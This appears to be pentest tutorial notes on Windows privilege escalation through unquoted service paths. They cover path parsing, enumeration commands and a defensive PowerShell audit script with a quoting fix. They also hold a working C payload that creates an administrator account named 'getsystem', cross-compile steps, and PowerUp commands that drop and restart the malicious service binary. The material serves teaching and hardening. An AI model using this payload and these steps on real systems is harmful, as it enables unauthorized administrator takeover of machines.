Unquoted Service Paths
An interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. This attack applies when we have Write permission on a service's main directory or on one of its subdirectories along the path, but cannot replace the existing files within them.
Each Windows service maps to an executable file that is run when the service is started. If the path of this file contains one or more spaces and is not enclosed in quotes, it may become an opportunity for privilege escalation.
When a service is started and its process is created, the Windows CreateProcess function is used. Looking at the first parameter of the function, lpApplicationName specifies the name and optionally the path of the executable file. If the supplied string contains spaces and is not enclosed in quotation marks, it can be interpreted in several ways, because the function cannot tell where the file name ends and the arguments begin. To resolve this, the function interprets the path from left to right until it reaches a space. At every space in the file path, it treats the preceding part as the file name (appending .exe) and the remainder as arguments.
For example:
Take the unquoted service binary path C:\Program Files\My Program\My Service\service.exe. Because of the spaces in the path, Windows tries to start the following executables, in this order, when the service starts:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My Service\service.exe
To search for candidate services (PowerShell):
PS C:\Users\root> Get-CimInstance -ClassName win32_service | Select Name,State,PathName
Using cmd (filters out services under C:\Windows\ and paths that are already quoted):
C:\Users\root> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
To check whether we can start and stop the identified service:
PS C:\Users\root> Start-Service VulnService
WARNING: Waiting for service 'VulnService (VulnService)' to start...
PS C:\Users\root> Stop-Service VulnService
How Windows tries to locate the binary of the unquoted service VulnService:
C:\Program.exe
C:\Program Files\Enterprise.exe
C:\Program Files\Enterprise Apps\Current.exe
C:\Program Files\Enterprise Apps\Current Version\VulnServ.exe
To check our access rights on these paths with icacls:
PS C:\Users\Administrator> icacls C:\Users\Administrator
C:\Users\Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
BEAST01\Administrator:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX,W) <- this is the kind of permission we are looking for (W = write into the directory)
Successfully processed 1 files; Failed processing 0 files.
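The manual steps above (enumerate unquoted paths, derive the candidate executables, check the directory ACLs) combined into one read-only audit script with the matching hardening fix. This is an added example, not part of the original notes or of PowerUp; the function names, the low-privilege group list and the simplified ACL check are assumptions.

```powershell
# Added audit script (not part of the original notes): lists services whose binary
# path is unquoted and contains spaces, reproduces the candidate executables that
# CreateProcess would try, and flags candidates whose parent directory is writable
# by low-privileged groups. Read-only: nothing on the host is modified.
$LowPrivGroups = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

function Test-LowPrivWrite {
    param([string]$Dir)
    # Simplification (assumption): only Allow ACEs for the groups above are
    # considered; Deny ACEs and nested group membership are ignored.
    if (-not (Test-Path -LiteralPath $Dir)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        # Write includes CreateFiles, i.e. the right to drop a new file in the directory.
        if (($ace.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::Write) -ne 0) {
            return $true
        }
    }
    return $false
}

function Get-UnquotedServicePathAudit {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' } |
        ForEach-Object {
            $svc = $_
            # Keep only the executable part; anything after .exe is arguments.
            $exe = if ($svc.PathName -match '^(?<exe>.*?\.exe)') { $Matches.exe } else { $svc.PathName }
            if ($exe -notmatch ' ') { return }
            $parts = $exe -split ' '
            # Same left-to-right interpretation as in the notes: C:\Program.exe, C:\Program Files\My.exe, ...
            for ($i = 1; $i -lt $parts.Count; $i++) {
                $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path -Path $candidate -Parent
                [pscustomobject]@{
                    Service         = $svc.Name
                    RunsAs          = $svc.StartName
                    Candidate       = $candidate
                    LowPrivWritable = Test-LowPrivWrite -Dir $dir
                    # Fix to apply from cmd.exe: quote the path so parsing is unambiguous.
                    Fix             = "sc config $($svc.Name) binPath= `"\`"$exe\`"`""
                }
            }
        }
}

Get-UnquotedServicePathAudit | Sort-Object LowPrivWritable -Descending | Format-Table -AutoSize
```

Rows with LowPrivWritable set to True are the ones to remediate; applying the Fix line (or moving the binary to a path without spaces) removes the ambiguity that the candidate list relies on.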
Example payload (placed at one of the candidate paths, it runs with the service account's privileges when the service starts):
#include <stdlib.h>

/* Executed by the service control manager when the service starts,
 * so the commands below run as the service account (typically SYSTEM). */
int main(void)
{
    system("net user getsystem getsystem /add");
    system("net localgroup administrators getsystem /add");
    return 0;
}
Cross-compile on Linux with MinGW:
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Using PowerUp.ps1 (automates the enumeration and the binary drop):
PS C:\Users\root> powershell -ep bypass
...
PS C:\Users\root> . .\PowerUp.ps1
PS C:\Users\root> Get-UnquotedService
PS C:\Users\root> Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"
PS C:\Users\root> Restart-Service GammaService